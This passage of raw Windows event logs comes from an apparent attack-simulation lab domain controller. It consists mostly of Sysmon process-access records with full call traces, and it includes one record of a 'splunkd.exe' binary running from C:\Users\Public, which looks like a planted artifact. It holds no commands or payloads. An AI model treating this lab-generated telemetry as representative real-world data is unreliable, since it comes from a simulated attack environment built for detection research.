397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2335,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:26.317\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:26.317","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2336,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:26.317\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:26.317","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2337,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:26.317\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:26.317","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2338,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:26.317\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:26.317","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2339,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:26.317\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:26.317","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2340,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:26.333\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1076-5F25-0000-0010DD220400}\r\nTargetProcessId: 3476\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:26.333","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1076-5F25-0000-0010DD220400}","TargetProcessId":"3476","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2341,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:26.474\r\nSourceProcessGUID: {E2A3D6B1-1076-5F25-0000-0010DD220400}\r\nSourceProcessId: 3476\r\nSourceThreadId: 3512\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:26.474","SourceProcessGUID":"{E2A3D6B1-1076-5F25-0000-0010DD220400}","SourceProcessId":"3476","SourceThreadId":"3512","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","TargetProcessId":"2792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2342,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:26.786\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:26.786","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":36028797018963968,"EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":10154,"SourceName":"Microsoft-Windows-WinRM","ProviderGuid":"{A7975C8F-AC13-49F1-87DA-5A984A4AB417}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76828,"ProcessID":0,"ThreadID":0,"Channel":"System","Message":"The WinRM service failed to create the following SPNs: WSMAN/win-dc-8400769.attackrange.local; WSMAN/win-dc-8400769. \r\n\r\n Additional Data \r\n The error received was 1355: %%1355.\r\n\r\n User Action \r\n The SPNs can be created by an administrator using setspn.exe 